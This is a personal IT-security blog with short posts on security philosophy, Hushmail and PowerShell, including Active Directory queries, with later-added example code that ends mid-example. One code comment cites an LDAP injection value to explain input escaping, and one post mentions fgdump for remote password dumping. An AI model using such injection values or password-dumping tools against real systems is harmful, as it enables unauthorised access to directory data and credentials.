    I know, I'm beating a dead horse, but it's an example I wanted off my chest and written down in my little journal here. Move along, these are not the droids you are looking for...
    .: work has been outweighing the life scales for the moment
    It's months like these that make me painfully aware of my growing list of personal projects. At work, we're butting up against some deadlines in what is maybe our biggest project in a long time: migrating our operations from our on-site data center to a DR site in a dedicated facility...by using the facility as our primary site. So basically not just a DR project, but also getting our production environments over there. Not easy or terribly fun...although our intimate knowledge of our environments has never been better. You can see some of my personal stuff to do over on a Security Catalyst thread that Cutaway started. I'm obviously not alone in wanting to retool and practice on the home network! :)
    .: random thoughts in response to other random thoughts
  • Ask any law enforcement officer if there is rampant depression because they will never really get rid of all the bad guys and bad things in the world, and if we should give up or change the playing field? What about ethical or moral activists or environmental activists?

  • If I decide to be a carpenter because I want to have an achievable goal, do I get stuck in the same old mud because I'll never be able to satisfy all the carpentry needs of my region? Or do we take pride in each single creation, or series of creations that contribute to the whole?

  • Back in the early 1900s, unwanted and teenage pregnancy was a huge problem, but several groups eventually came together and educated women and promoted programs designed to address the issues. We have not solved these problems even today, but does that mean those early or subsequent efforts were useless and we look back on those people with a pitiful eye?

  • When you wash your car, do you avoid sprinkler puddles for a few days? Do you feel sad that the car will just get dirty in a few weeks anyway? Do you curse God because it rains the day after you wash the car? Do you take joy in the washing, even though you know dirt is inevitable? Do you wash the car and then avoid going places until you really have to so that it stays cleaner longer? Do you just wash it an obscene amount of times? And for what reward all this effort?

    Basically, our dilemma is not unique, and at least our efforts are measurable in both tangible and non-tangible results. Any time we get down in the dumps about security, it is because we have poor goals and measurements. Are we making a difference? Should we change our name to make it better? Do we expect to eradicate insecurity, information loss, and protect our systems ultimately otherwise we are failures? Do we worry that our jobs stem from other people's loss or suffering, or do we realize we are helping people deal with the inevitable? Inevitable: human mistakes, bad morals, economic choices [budgets], education to not make poor decisions, etc...these are our combatants, not pain and suffering.
    .: do odd bank mailings make you paranoid these days, too?
    My bank recently changed its name, and along with it some of its business decisions. Most likely a buy-out of some sort, but I really couldn't care less about stuff like that.

    Tonight I got one of those little envelopes that you tear off three sides for. Usually these are pretty important, so I always open them before Bills Time. Whoa...a PIN? For me? Ok, last 4 digits of this card...nope, not my ATM card. Nope, not my credit card with this bank. Rut roh, raggy. Let's go back a few days in mail...

    Oh, look, an envelope with a new Debit card. Ok, I don't want a debit card, I want an ATM card. Really, a 4-digit PIN is not a huge security measure if someone looks over your shoulder. I'd rather protect viewing at an ATM machine than in a crowded check-out line somewhere with a clerk watching straight down. I can also scope out any suspicious gear at an ATM. I like my ATM card and have taken active measures to decline debit cards.

    I also find another mailing from a few days ago explaining the change, that my ATM card is being replaced by this Debit/ATM card.

    Great, thanks. I guess that choice has been lost to me. :)
    .: proving your security
    I mentioned last year, and in various other posts, proving your cyber state. In that post, I mentioned safety, but I really meant security. Are you secure? Prove it. Richard Bejtlich echoes (or restates, since I'm not sure where I first heard this idea) that this is a key tenet of where we should be with our own cyber security. In fact, I will go so far as to say this question is as important as cogito ergo sum is to philosophy (it's the basis of it, a foundational statement). It is more than a marketing ploy or illustrative approach; it is a basis for our entire industry and philosophy on security, business, IT.

    Please read Richard's post. In recent months he has been throwing various ideas around, and you can almost see the screws turning, popping this extremely formative and important post out. He builds up to what he defines as security, or rather, acceptable security.
    .: complexity is evil, evil, evil
    Work projects have been kicking my ass lately, and basically sapping the will to live! In all seriousness, I am a firm believer that complexity is the ultimate evil to all things IT, not just security. It turns simple plans into extremely frustrating projects that don't end.

    Unfortunately, complexity has a driver, and that is called the Deadline. Impose deadlines that don't match the work to be done, and often the end result is a chaotic, complex mess...
    .: sending mail in powershell: mail message objects
    I've made a previous post about sending emails in PowerShell. Some additional notes I have found include creating the mail message as an object rather than straight strings. I also wanted to make multi-lined emails (carriage return, line feed, second line...), which seems easier when creating the message as an object. One could properly declare the email address string as a mail address object, but I just let PowerShell auto convert it for me.
    # Client that drops the message into the local IIS SMTP pickup directory instead of talking to a server
    $smtp = New-Object Net.Mail.SmtpClient
    $smtp.DeliveryMethod = "PickupDirectoryFromIis"
    # Build the message as a MailMessage object; the address strings assigned to From/To are auto-converted to MailAddress
    $objMailMessage = New-Object System.Net.Mail.MailMessage
    $objMailMessage.From = "michael@server.com"
    $objMailMessage.To.Add("michael@server.com")
    $objMailMessage.Subject = "Subject line."
    # `n is a newline inside a double-quoted string; use `r`n if an explicit CR+LF pair is wanted
    $objMailMessage.Body = "Hello `nThis is a second line."
    $smtp.Send($objMailMessage)
    .: dan morrill on ethics in information security
    I've been so terribly busy this past few weeks that I've not been able to keep up much with the blogs and news out there! However, one article I am very glad to have gotten to is a quick read from Dan Morrill that touches so many pain/pressure points for our industry. Need a conversation-starter with your fellow geeks? Pick a paragraph from this post and start yammering. Basically, this post is our life in a nutshell right now.

    My only concern is how we actually can win battles. I guess I should define that in this case I consider the enemy the attackers. The only way we can truly win against them is to catch them in the act and shut them down. Defending against their attacks is nothing more than being a hockey goalie slapping away on-goal shots. We're not often allowed to cross the line in the center and delve into the attacker's territory, at least not with the blessing of our organization unless we happen to work for law enforcement.

    Of course, one can attack this position by modifying my definition of who the enemy is. If our battle is against the attacks, we certainly can win battles, many of them, and make progress. We can limit the attacks that affect us or that make us worry, deflect the ones that we do have to worry about, and detect the ones that make it through our gauntlet of defenses. We win battles every day when a random IP fails to brute our SSH server, or scripts/root.exe fails to execute against our web servers.
    .: proper education against werewolves?
    I just wanted to capture some words from Bejtlich for my own preservation here because they rock. Feel free to take both sentences as wholly different subjects.
    Forget about user education; I recommend management education. Deflect silver bullets.
    If you want to read the post this was taken from... A-fucking-men. We can't expect business and users to Get It if our own IT staffs and managers don't Get It.
    .: tool and book releases in my inbox
    There have been a number of things released or updated recently that I want to try out, update, or read. Typically at work if I see new things, I'll send notes to myself at home on my gmail account, but lately this has been getting jammed up as work has been insane lately. So I'm offloading some of the quick notes into blog posts...who knows, maybe someone else will like these too!

    OSSEC 1.4 has been released. This is still on my short list of projects.

    IDS Policy Manager 2.2 has been released. I'd love to check this out, but I need to get my Snort box fixed at home.

    fgdump 1.7 is out. fgdump is a utility for dumping Windows passwords, aka using pwdump more successfully and remotely.

    Saw a note and placed an order today for a copy of Michael Rash's latest book, Linux Firewalls: Attack Detection and Response.

    Nipper 0.10.8 is out. Nipper can perform security audits on Cisco device configs.
    .: misunderstood hushmail hands over mail records
    I'm still playing news catch-up, but I was drawn to this Wired blog post about Hushmail handing over mail records. This is a confusing article, quite honestly.

    First, I will swear that Hushmail has been offering webmail service far prior to 2006 as mentioned in the article. I've been using them off and on for many years (both free and pay accounts), and definitely prior to 2006.

    Second, I've never been aware of any sort of Java applets or encryption when doing mail with Hushmail. Maybe this is just in the commercial version, but I suspect it really only works with email sent to other Hushmail users or recipients forced to log into Hushmail to retrieve the mail.* I can also attest to never, ever having to supply any passphrases, only the password to my login. So this whole encryption thing with Hushmail is a niche that I would be willing to bet few people truly use or were even aware of.

    Still, Hushmail seems a very misunderstood service, as they market to security conscious people as being anonymous and private, when in fact it really is no less private than Gmail, unless you use their annoying and "non-solution" tools (and as the article demonstrates, even that isn't solid). I personally just liked having the anonymity, as opposed to the privacy.

    If someone were truly paranoid enough about their email privacy and anonymity, they are much better off scouring the net for open mail relays, using pgp, and then sending through an ever-rotating list of relays to their recipients. This protects the message in transit, spreads out your mail to such a degree that no one can form a profile of you, and hides your own originating information. And even that doesn't protect your address unless you use rotating and/or disposable mail addresses...

    * I really don't agree with that approach to email security, and most people who use it really hate the annoyance of having yet another web site to get mail, rather than it coming to their own mailboxes. And yes, we have a secure mail solution that does this, but users both internal and external either don't understand how to use it or actively hate it and try their damnedest to work around it...it's just a terribly lame approach. What really sucks is marketing who then tries to say they secure email with encryption when I damn well know they can't unless it never leaves their servers. Such misleading garbage that sucks in less-technical purchasers.
    .: rant on the economics of disk storage and business priorities
    The economics of IT are always going to be a pain point. Sadly, such penny-pinching when it comes to IT spending can result in some pretty creative issues. This is just a small Friday rant from work, so read at your expense!

    Today we had a web server D drive fill up (the drive with our data), which caused some errors to start occurring on that server. This filled up because the log files weren't getting cleaned up. We didn't get alerts because our web servers run on such small disks that we were getting constant reminders about low disk space, so we turned them off as no one would pony up for more space. *

    The log files weren't getting cleaned up because a separate web log processing server's disk was full and couldn't pull the logs in anymore. This filled up because no one a) wants to make a policy on how long to keep log files or how important they are, so they are kept forever, and b) no one wants to look at the criticality of the server and assign a dollar value, which can then be used to offset costs for more storage. So it stays with the disks it has.

    So a non-critical system that can't get more storage due to penny-pinching caused an intermittent production outage on a system that itself is running on fumes because no one wants to put out for more storage. Capacity planning and budget submissions are one thing, but as much as we do them, the exec/business side continues to say "No thanks," to the expense.

    Ugh! I understand this can be a way to go for companies, kind of a JIT of disk storage, but it really, really helps to be up front with that policy so IT staff doesn't have to constantly work in a "worry/told you before" sort of mode all the time. It's just not important until it brings down production and clients notice. Sounds awfully similar to security!

    * I love the little side risk to this practice. Developers can put out code quite easily enough on their own to fill the disks and cause web servers to all die in production. And even if intent isn't there, we do run the risk that someone will accidentally publish something large that effects a DoS.
    .: powershell and active directory searching
    I've been doing some more work using PowerShell for small ad-hoc types of scripts. Basically I keep some notes around, and adjust those notes for what I need at the time. This works great when I need to query certain things from our Active Directory. While we use AD a lot, only my team uses it, which means it gets messy and out of sync quickly.

    A recent request needed me to pull all the supervisors and managers in our company. Odd, but no one keeps a list of these, nor do we have neat groups in AD to accommodate the request. Great. I could, however, pull out everyone who is listed as having a "direct report" in their AD account, which is something the desktop techs *are* good about updating.*
    $objADSearcher = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
    # objectClass=user alone also matches computer accounts; objectCategory=person narrows it to people
    $objADSearcher.Filter = "(&(objectCategory=person)(objectClass=user))"
    # without a PageSize the server caps FindAll() at its default limit (1000 objects)
    $objADSearcher.PageSize = 1000
    $objFoundUsers = $objADSearcher.FindAll()

    [array]$objADUsers = @()

    foreach ($t in $objFoundUsers)
    {
       # directReports is only populated on accounts that someone else reports to
       if ($t.properties.directreports)
       {
          $t.properties.name
          $objADUsers += $t
       }
    }
    This snippet will search out all user accounts in AD and display the names of those who have direct reports. Further properties on any given account can be found by reading its .properties, e.g. $objADUsers[45].properties. I've also had a need to quickly find all the members of a group in a way that allows me to copy and paste the results.
    $i = "Supervisors Group"
    $objADSearcher = new-object DirectoryServices.DirectorySearcher([ADSI]"")
    $objADSearcher.filter = "(&(ObjectClass=Group)(name=$i))"
    $objFoundGroup = $objADSearcher.FindAll()
    $objFoundGroup[0].properties.member
    This will display the result of the search for Supervisors Group. If only one object is returned, I often forget that I still need to reference it by index [0]. Also note that $i is dropped straight into the LDAP filter, so it should only ever be a name I typed myself; anything that came from a user or a file would need the LDAP special characters ( ) * \ escaped first or it can change the shape of the query.

    Now, if I get a user back and want to connect directly into their AD object, I need to leverage the path property.
    $ADSPath = $objFoundUsers[0].path    # FindAll() returns a collection even for one hit, so pick the entry by index
    $container = [ADSI]$ADSPath
    $container.manager                   # distinguishedName of the manager, if set
    $container.directreports
    * I am positive there are many ways to accomplish these tasks, and I may not be doing the most optimal method, however, this method does work for me for now, until I find some better way.
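The same DirectorySearcher approach, as an added example that is not code from the original post. It adds the two things the ad-hoc snippets above skip: paging (AD stops FindAll() at 1000 objects otherwise) and escaping of any value spliced into an LDAP filter, plus server-side filtering on directReports instead of looping over every user. It assumes a domain-joined session with read access to the directory; the function names and the 'jdoe' account are placeholders of mine.

```powershell
# Added example, not from the original post. Assumes a domain-joined session with read access to AD.

# Escape a value before interpolating it into an LDAP filter (RFC 4515 rules).
# Without this, a group name like "*)(objectClass=*" quietly widens the query.
function ConvertTo-LdapFilterValue {
    param([Parameter(Mandatory=$true)][string]$Value)
    # Backslash first, so the escapes added afterwards are not themselves re-escaped.
    $Value.Replace('\', '\5c').Replace('*', '\2a').Replace('(', '\28').Replace(')', '\29').Replace([string][char]0, '\00')
}

# Run a search and return every SearchResult, paged so large domains are not truncated at 1000.
function Invoke-PagedAdSearch {
    param(
        [Parameter(Mandatory=$true)][string]$Filter,
        [string[]]$Properties = @('name', 'samaccountname', 'distinguishedname')
    )
    $searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]"")
    $searcher.Filter   = $Filter
    $searcher.PageSize = 1000                          # enable paging; results arrive in 1000-object chunks
    $searcher.PropertiesToLoad.AddRange($Properties)   # only pull the attributes we actually need
    $results = $searcher.FindAll()
    try     { @(foreach ($r in $results) { $r }) }     # enumerate fully before disposing
    finally { $results.Dispose() }                     # frees the LDAP connection the collection holds
}

# People with direct reports, filtered on the server. objectCategory=person excludes computer
# accounts, which also carry objectClass=user.
function Get-AdManagers {
    Invoke-PagedAdSearch -Filter '(&(objectCategory=person)(objectClass=user)(directReports=*))' `
                         -Properties @('name', 'samaccountname', 'distinguishedname', 'directreports')
}

# Members of a named group; the name is escaped, so it cannot alter the filter.
function Get-AdGroupMembers {
    param([Parameter(Mandatory=$true)][string]$GroupName)
    $safe  = ConvertTo-LdapFilterValue $GroupName
    $group = @(Invoke-PagedAdSearch -Filter "(&(objectClass=group)(name=$safe))" -Properties @('member'))
    if ($group.Count -eq 0) { return @() }
    # Groups past roughly 1500 members return 'member' as a ranged attribute (member;range=0-1499);
    # this plain read only sees that first range.
    $group[0].Properties['member']
}

# Bind to the user's own object to read attributes the search did not load, such as manager.
function Get-AdManagerOf {
    param([Parameter(Mandatory=$true)][string]$SamAccountName)
    $safe = ConvertTo-LdapFilterValue $SamAccountName
    $hit  = @(Invoke-PagedAdSearch -Filter "(&(objectCategory=person)(objectClass=user)(sAMAccountName=$safe))")
    if ($hit.Count -eq 0) { return $null }
    $user = [ADSI]($hit[0].Path)
    $user.Properties['manager'].Value                  # the manager's distinguishedName, or $null
}

# Usage:
Get-AdManagers | ForEach-Object { $_.Properties['name'][0] }
Get-AdGroupMembers -GroupName 'Supervisors Group'
Get-AdManagerOf -SamAccountName 'jdoe'                 # 'jdoe' is a placeholder account name
```

Because the escaping helper is applied before every interpolation, a group or account name taken from a ticket, a CSV or a web form cannot turn the lookup into a wildcard query; the paging and the ranged-attribute comment are the two places where a seemingly complete result set is silently incomplete.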
    .: soccer goal security, risk analysis, and more from an auditor
    I hesitate to post this link which I gleaned from Anton Chuvakin's blog, because it has a lot of hard sentences to read and rambles a bit, but it has enough stuff to be a bit thought-provoking. Anton Aylward's post deals with soccer goal security, but touches on a ton of things involving security.
    In his marvelous 1992 novel “Snow Crash”, Neal Stephenson describes a franchising system and makes reference to the “three ring manual”. This manual is the set of operating procedures for the franchise, who does what and how, down to the smallest detail. I mention this in contrast to, for example, some of the businesses that failed after 9/11. These businesses did not have any ‘plant’ - desks, computers, software, even data - that could not be replaced. They failed because their real assets were not documented - the business processes existed solely “in the heads” of the people carrying them out.

    The real assets of a company are not the COTS components. This is a mistake that technical people make. The ex-IBM consultant, Gerry Weinberg, the guy who came up with the term “egoless programming”, also pointed out that people with strong technical backgrounds can convert any task into a technical task, thus avoiding work they don’t want to do. Once upon a time I excelled in the technical side of things, but I found that limited my ability to influence change with management.
    Interesting stuff. Anton A. is an auditor, and as such has a unique perspective on the industry. It is easy (maddeningly easy) to point out the flaws in other people or businesses or processes, and no one does it better than auditors. Kinda like IT journalists who can spout off best practices and "told ya so's" but don't know anything about IT beyond their home office 10-in-1 fax printer. Ok, that's unfair for the auditors, as they do have more usefulness and knowledge, in my books. :)
    .: powershell working with time objects
    I have a perpetually running powershell script which is always looking at a text file to see if an install is scheduled to run within the next 2 minutes. This text file just contains a list of times when installs should run (or nothing). I want this install to run every night at 12:10 am. To do this, I need to make a list of the next 100 days' worth of 12:10am entries.
    $basetime = get-date "11/15/2007 12:10 AM"
    [array]$times = @()
    for($a=0;$a -lt 100;$a++){ $times += "$($basetime.AddDays($a).ToString()) both" }   # -lt, so exactly 100 entries (-le would give 101)
    $times
    11/15/2007 12:10:00 AM both
    11/16/2007 12:10:00 AM both
    11/17/2007 12:10:00 AM both...
    This gives me a list of 100 strings that can be read into get-date as a time/date object!
    $blah = get-date $times[3].replace(" both","")
    Why the hell is that "both" part in there? Well, that's something just for me, which describes the install that is occurring. When evaluating schedule entries, I replace those off and trim the string down. Why do I want to read this into get-date again? So I can do better compares!
    $objScheduleTime = $null
    try { $objScheduleTime = Get-Date $blah } catch { }   # a string Get-Date can't parse throws; leave the variable $null
    if ($objScheduleTime -isnot [DateTime])               # $null.GetTypeCode() would itself throw, so test the type directly
       { "timedate is invalid" }
    else
       {
          $TimeDifference = $objScheduleTime - (Get-Date)   # DateTime minus DateTime gives a TimeSpan
          if ($TimeDifference -lt [TimeSpan]::Zero)
             { "time is in the past" }
          else
             { "time is in the future" }
       }
    First, convert $blah into a date-time object, then check that the conversion really produced a DateTime. A failed conversion needs to be handled and not carried on as a null object, or the rest of the script will complain. As usual, there are plenty of ways to do this, but this makes sense to me.
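The schedule-file handling described in this post, written out as an added example rather than code from the original: it generates the same "<time> both" lines, then evaluates them the way the polling script needs to, tolerating a broken line, skipping the past, and reporting what is due within the next two minutes. The two-minute window, the tag word and the $env:TEMP file path are assumptions taken from the post's description; the function names are mine.

```powershell
# Added example, not from the original post.

# One line per day starting at $Start, in the same "ToString() tag" form the post builds.
function New-ScheduleLines {
    param(
        [Parameter(Mandatory=$true)][DateTime]$Start,
        [int]$Days = 100,
        [string]$Tag = 'both'
    )
    for ($i = 0; $i -lt $Days; $i++) {            # -lt, so exactly $Days entries
        '{0} {1}' -f $Start.AddDays($i).ToString(), $Tag
    }
}

# Parse one line. The last token is the tag; everything before it is the date as Get-Date wrote it.
# Returns $null on anything unparseable instead of a half-built object.
function ConvertFrom-ScheduleLine {
    param([Parameter(Mandatory=$true)][string]$Line)
    if ($Line.Trim() -match '^(?<when>.+)\s+(?<tag>\S+)$') {
        $when = [DateTime]::MinValue
        if ([DateTime]::TryParse($Matches['when'], [ref]$when)) {
            return New-Object PSObject -Property @{ When = $when; Tag = $Matches['tag'] }
        }
    }
    return $null
}

# Entries whose time falls within [$Now, $Now + $WindowMinutes]; past and broken lines are skipped.
function Get-DueEntries {
    param(
        [Parameter(Mandatory=$true)][AllowEmptyCollection()][string[]]$Lines,
        [DateTime]$Now = (Get-Date),
        [int]$WindowMinutes = 2
    )
    $windowEnd = $Now.AddMinutes($WindowMinutes)
    foreach ($line in $Lines) {
        if ([string]::IsNullOrEmpty($line.Trim())) { continue }
        $entry = ConvertFrom-ScheduleLine $line
        if ($null -eq $entry) { Write-Warning "skipping unparseable schedule entry: $line"; continue }
        if ($entry.When -ge $Now -and $entry.When -le $windowEnd) { $entry }
    }
}

# Usage with constructed data: 100 days of entries plus one deliberately broken line,
# polled as the long-running script would at 12:09 AM on the second day.
$schedulePath = Join-Path $env:TEMP 'schedule.txt'       # assumed location
$lines = New-ScheduleLines -Start (Get-Date '11/15/2007 12:10 AM') -Days 100
$lines + 'not a date both' | Set-Content -Path $schedulePath
Get-DueEntries -Lines (Get-Content $schedulePath) -Now (Get-Date '11/16/2007 12:09 AM')
```

The point of returning $null from the parser and filtering on it in Get-DueEntries is the one the post makes: a single malformed line in the text file should produce a warning, not take down a script that is supposed to run forever.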
    .: sometimes developers just aren't playing for the same team
    This is the kind of stuff that makes us admins infuriated at developers. Just to illustrate, pretend we have 3 testing environments and then Production for a web app. Env1, Env2, Env3, Prod. It is expected code will be moved up through those environments sequentially.

    Developer Ted: I am rolling out code to environments Env1 and Env2 at the same time.

    [a few hours later]

    Developer Ralph: Env2 is broken and my coworkers and I can't get anything done. What's wrong?

    Admin Mike: The code rolled out to multiple environments earlier broke things and made the environments unstable. We're working to fix this now. Talk to Ted who rolled it out in multiple places all at once to not do that in the future.

    Developer Ralph: But I need to work now, and so do my coworkers. We're going to start doing our work in Env3.

    Admin Mike: [blank look knowing I don't have authority here]

    [short amount of time passes]

    Developer Ralph: I need support in Env3 because it is not working properly now.

    Admin Mike: Well, some of the stuff you moved up shouldn't have been moved up and that environment is borked now and we'll have to expend more energy to fix it.

    Developer Ralph: But I and my people need to work, should we start moving to test in Production?
    At this point strangling the developer actually seems like a plausible mitigation to further destruction and downtime...
    .: ebb and flow
    "Sun and moon travel through the sky, they set and rise again. The four seasons succeed one another, flourishing and then fading again. This is a metaphor for the interchange of surprise unorthodox movements and orthodox direct confrontation, mixing together into a whole ending and beginning infinitely." -The Book of War, Chapter 5: Strategic Advance.
    .: a little bit of age perspective
    It is difficult to get a sense of someone's age in this digital world, so I wanted to take a quick moment to let any readers know that I turned 30 yesterday. So, yes, I can talk about Star Wars and only think about the first three movies.
    .: dlp and database activity monitoring info from mogull
    Someday I will likely need to sound smurt about DLP, even though I think it will be a feature and not a market given a couple years. And then, of course, it will just get watered down and slowly forgotten over the next 5 years. But, still, it's a buzzword with mgmt.

    So for my own future edification, this post is a pointer over to Rich Mogull's 7+1 part series on DLP. Part 7 includes links to the other 6, and the +1 is an overview of the recent trend of DLP acquisitions.

    And just because I don't want another post, Mogull also has information in a 2 part series about database activity monitoring products. Part 1 and Part 2.
    .: on the art of balancing awareness and technological security
    I like Kurt Wismer's post, "the user is part of the system." This is true.

    I'm often misunderstood when I take a stance against user awareness types; often I'm taken as being totally against user education, when in fact I am just against over-emphasizing user education as the way to achieve security. I don't agree with that, and I think user education is like compliance, it educates the lowest denominators in a corporation, but it won't stop malicious activity or mistakes. It helps eliminate naive or ignorant mistakes. (Ok, I'll give that some people will greatly benefit and listen to awareness, but that simply cannot be all people.) A blend of awareness and technology is what I feel is the key, although I'll put just a bit more weight on the objectivity of technology... I mean, there is a reason social engineering always works, even with obscene amounts of user education.

    I'm a firm believer in technological controls to mitigate the stupid choices that users can make, or simply limit what they can do. Taking this to an extreme is just as bad as taking user education to an extreme: we can create a nice, tidy, restrictive, safe cage for users to sit in and do their work. But is that cage going to make that user happy and productive, or docile and uncreative? This can lead to a discussion on where security should lie: the system, or the network. Some may say the system is already lost because we can't make it a stifling cage...not without affecting our users greatly.

    It seems that having freedom of choice is a fundamental part of the human condition, even to the point that we all bend or outright break rules every day, such as traffic rules. If people bend or break those rules when it has very real, obvious consequences, how do we really think users will act regarding our own company policies that are much more arcane and the threats far removed? Are your users ultimately more happy having admin rights on a system or having a set cache of programs they can use and nothing more?

    Is this maybe one reason the web has become so enabled in the last few years? We try to control what they can do, so they use port 80 and a web browser...is the desire for choice and freedom always going to trump our smaller, user-impacting security approaches?

    That's really part of the art of corporate security; finding that balance that works. It is also the unfortunate part of our industry: no one standard is going to work. One person's approach won't work in every situation or every corporation. More so than the thousands of solutions each company can have to solve various needs and problems, the users are even more varied and unique. Ok, fine, very general rules will work, like "patch your systems." But let's face it; that shit is the easy part, the part any arm-chair analyst can recite.

    Nonetheless, I love such discussions, even if there is not ultimate agreement. At least we're talking about it and being open to creative solutions. I'd almost rather talk to open-minded people who don't have an answer to these problems than those who think they know some Merlin-esque answer to solve all our problems everywhere...
    .: more reasons why businesses are insecure
    Anton Chuvakin linked me over to an article about 7 reasons businesses are insecure. Check the reasons, as they are good ones.

    I wanted to add a couple more, however.

    8. Economics. Let's face it. Security costs money and time for a company, and unless there are regulatory or economic reasons (or surplus budget!), a company really won't spend more money on the security. Companies are economic entities and as such work to maximize their profits. Some people don't like to talk about that, but that's reality. And this works not just on a macroscopic level with budgets, but also on a microscopic level: do your IT techs prioritize security projects behind business-facing projects and fires? Yes, they do. Doh!

    9. Technical gulf from the trenches to the upper offices. When a CISO proclaims his company secure, most of us snicker a bit and throw back another shot of JD. When a CISO proclaims his company is in compliance and has a strong security process, do you really think he knows what the hell he is talking about? Or is he just playing salesman-lipservice and really has no clue if the company geeks really are making things secure? Often I wonder about that gulf between the techs and the upper offices and which reality each is living in day to day. Some CISOs Get It and know their environment, but I think those with a Clue are still in a huge minority (not necessarily because they're not technically proficient, but simply because sometimes they are just too removed from the day-to-day).

    9.5 Likewise, does your audit/security team have the skills necessary to tell the difference between secure and insecure, or are they just going over a checklist and then going to lunch? Technical expertise in regards to security is spotty in the technical ranks, especially on a broad level. I believe that more efforts in user education should be pointed towards technical staff (security and general IT) and not towards general employees.
    .: intrusion detection systems and analysts
    An interesting article (and comments) about IDS technology over at Security Focus. IDS is still a discussion-starter and you can get a huge range of valid responses when asking questions about how to value an IDS system.
    .: sans handler diary now allows comments
    I only just noticed that the ISC SANS Handler's Diary now allows comments. Finally!
    .: morrill's top ten things in info security to do now
    Dan Morrill posted the "top ten information security issues to tackle now" which I find extremely cool. I've jotted some reactions below.

    Get an Evangelist- I just wanted to highlight this option as an alternative to the misguided efforts to "make IT more business savvy" and the vice-versa option. A liaison is truly what is needed. You don't tell Accountants to be able to throw down a sales pitch to a client, nor ask Sales to troubleshoot their own PCs (oh christ do they try though!). You get people to interface across the boundaries, not try to get everyone able to do everything. Sure, IT people do need to come out of their shells a bit and yes, be a bit more business savvy, but let's not turn that into the savior of "IT vs business side" heartaches like I've seen attempted.

    Train IT- YES! And remember that training can also include self-training. Give us some time during our days to properly self-train on new technology. This can save a new hire or formal (spendy) training. Most of us are in IT for various reasons, the most common I bet would be our joy at solving problems and puzzles. Yes, we also do get depressed when we can't tackle the new VOIP system properly because we just don't have the free time in our schedules...

    Develop a defense in depth program for the company...Listen to your IT department; they know where the bodies are buried.- Amen! Talk to IT, and have them list their pet projects or things that just have never gotten done but they'd like to get done. I bet a lot of those projects are solid projects that would fit into a defense in depth strategy. Keep that master list and start ranking and evaluating the options. Then start knocking some of them away! Sure, the list may be a depressing list at times, but we all need roadmaps and IT workers have their fingers down on the pulse of the company's technology and information.
    .: deep thoughts by jack infosec
    It's that time of year. We can sit back on cold near-winter nights in front of a fire with a pipe in hand, rocking back in a comfy chair and muse. Yup, it's a time this week for discussions in information security!

    Hoff has been talking about valuing information security, always a passionate subject for everyone, and one without a clear (or even muddy!) answer. He's also talking about security and disruptive innovation. Good stuff to read! Oh, and while you read what he has to say, try to convince him to change back to "Rational Security." I tried to register rationalsurvivability.typepad.com but wasn't willing to pay the initial fee...doh! There isn't even a category on his site for survivability! Fad! Fad! I predict he'll quietly revert back after the start of the year. ;)

    It really felt like Bejtlich was gearing up for some revelatory posts, and he pushed one out in talking about how controls are not the solution. Instead, look at the outputs.

    And Mogull had a nice comment in a recent post of his, "While the encryption market isn’t nearly as big as most of the world wants you to believe...". I agree. I think many are waiting for this "market" to turn into the inevitable fea...no, it won't be a "feature," it'll eventually be standard and just accepted. For now, HDE/FDE is still difficult to manage across an enterprise, wrought with frustrations, and managers would rather see fewer mobile devices anyway. Why protect the laptops we really dislike deploying? Just deploy fewer! And so on...
    .: sans top 20 has lost its flavor...
    Yes, SANS has released their latest top 20 Internet Security Risks report. And Dark Reading points to it.

    Tim Wilson at Dark Reading opens up: "There are two major problems with the security of computers: the people who use them and the people who write software for them.". You don't say?!? I think that covers everyone except my grandmother...

    Ok, so Tim's article gets better and I like his pointing out that home-grown apps are big threats, which will make people think a bit more about open source and other, well, home-grown apps. Paying for software every cycle sucks, but is the cost of the software worth the possibly improved security and support? Good question.

    My biggest complaint about the SANS Top 20 list these days? It's too nebulous. Let's see...web browser, email clients, media players, and office software. Did they leave anything out?!?! Yes, IM services...oh wait, they got that too.

    Windows, *nix, and Mac. Uhh..again, did they leave anything out? Well, yes, they may have missed something, but the catch-all Zero-Days kinda covers the ass end of the list.

    Yeah, thanks for this wonderfully nebulous list that really is far less actionable than it used to be. Sure, it illustrates our security risk landscape fairly well, but it is definitely targeting managers and less involved/informed people these days. Rather than being the top 20 risks, it is basically an all-encompassing "here's all the risks you need to worry about" list for CSOs and journalists to care about.

    Fine, there is at least one thing missing. Wireless issues, both with regards to 802.11 devices and Bluetooth. Sure, they mention it twice, once in Unauthorized Devices and again in Instant Messaging, but that's just lame and really does downplay the issues. Sure, you can't have someone in Russia sit down and pwn every Starbucks wireless user in 60 seconds, but the problem still exists on a microscopic level. Want to fly under the radar or target an exec because you're being paid by competition to do so... Hell, it would have been trendy to include this with the simple mention of the alleged intrusion vector for the TJX breach.

    Alas, I still like the list because it gives us something to point to when management thinks the world is peachy-keen and full of rainbows in our office. Still, I'd rather this list were still interesting and relevant to me, rather than trying to be a "list" that tries to capture everything. Maybe it's just a sign of a maturing industry and a much wider interested audience that needs to be included...
    .: passing back values to a calling powershell script
    I've previously posted on how to use a PowerShell script to call another PowerShell script, even with a variable passed in! What about returning a value to the calling PowerShell script? This is actually pretty easy and intuitive for a single variable. In my case, I want to know whether the called script failed or not. This first script simply calls the second script, script2.ps1, and sets its result to $return. Then I echo back the $return value to make sure it stuck.
    script1:
    $return = & "c:\script2.ps1"
    $return
    This second script simply prints text to prove it was called, then returns back $true.
    script2:
    Write-Host "Hello World!" -back yellow -fore green
    return $true
    And this is the result:
    PS > ./script1.ps1
    Hello World!
    True
    PS >
    There are no doubt more sophisticated means to return multiple values and even objects back, which may or may not be the same thing as I've given above, but this sufficed to meet a need I had to just pass back a complete/fail variable. One thing to keep in mind: $return captures everything the called script writes to the output stream, not only what follows "return". Write-Host is safe because it goes straight to the console, but a stray Write-Output or a bare expression in script2 would turn $return into an array with $true at the end of it.
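The calling pattern above, as an added example that is not code from the original post. Scriptblocks stand in for the two .ps1 files so it runs in one session; "& 'c:\script2.ps1'" on a real file behaves identically. It shows the catch with "$return = & script": the caller receives the script's whole output stream, so one stray line of output turns $true into an array, and it shows one way to call a worker so that the result still comes back cleanly. The function and variable names are mine.

```powershell
# Added example, not from the original post.

# A worker that reports its outcome as data. Write-Host goes to the console only and is never
# captured by the caller, which is why the post's "Hello World!" did not end up in $return.
$worker = {
    param([string]$Target)
    Write-Host "working on $Target" -BackgroundColor Yellow -ForegroundColor Green
    if ($Target -eq 'bad') {
        return New-Object PSObject -Property @{ Success = $false; Message = "could not reach $Target" }
    }
    New-Object PSObject -Property @{ Success = $true; Message = 'ok' }
}

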